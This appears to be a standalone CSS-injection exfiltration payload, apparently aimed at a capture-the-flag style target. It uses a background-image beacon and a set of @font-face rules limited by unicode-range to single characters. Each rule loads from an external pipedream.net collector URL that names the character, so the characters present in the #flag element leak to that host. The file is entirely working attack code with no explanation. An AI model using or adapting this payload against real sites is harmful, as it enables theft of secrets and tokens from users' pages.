body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W16')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w16,p98w16,p106w16,p112w16,p115w16,p121w16,p122w16,p48w16,p49w16,p52w16,p53w16,p55w16,p125w16,monospace;width:16ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W16');unicode-range:U+0061}
@font-face{font-family:p98w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W16');unicode-range:U+0062}
@font-face{font-family:p106w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W16');unicode-range:U+006A}
@font-face{font-family:p112w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W16');unicode-range:U+0070}
@font-face{font-family:p115w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W16');unicode-range:U+0073}
@font-face{font-family:p121w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W16');unicode-range:U+0079}
@font-face{font-family:p122w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W16');unicode-range:U+007A}
@font-face{font-family:p48w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W16');unicode-range:U+0030}
@font-face{font-family:p49w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W16');unicode-range:U+0031}
@font-face{font-family:p52w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W16');unicode-range:U+0034}
@font-face{font-family:p53w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W16');unicode-range:U+0035}
@font-face{font-family:p55w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W16');unicode-range:U+0037}
@font-face{font-family:p125w16;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W16');unicode-range:U+007D}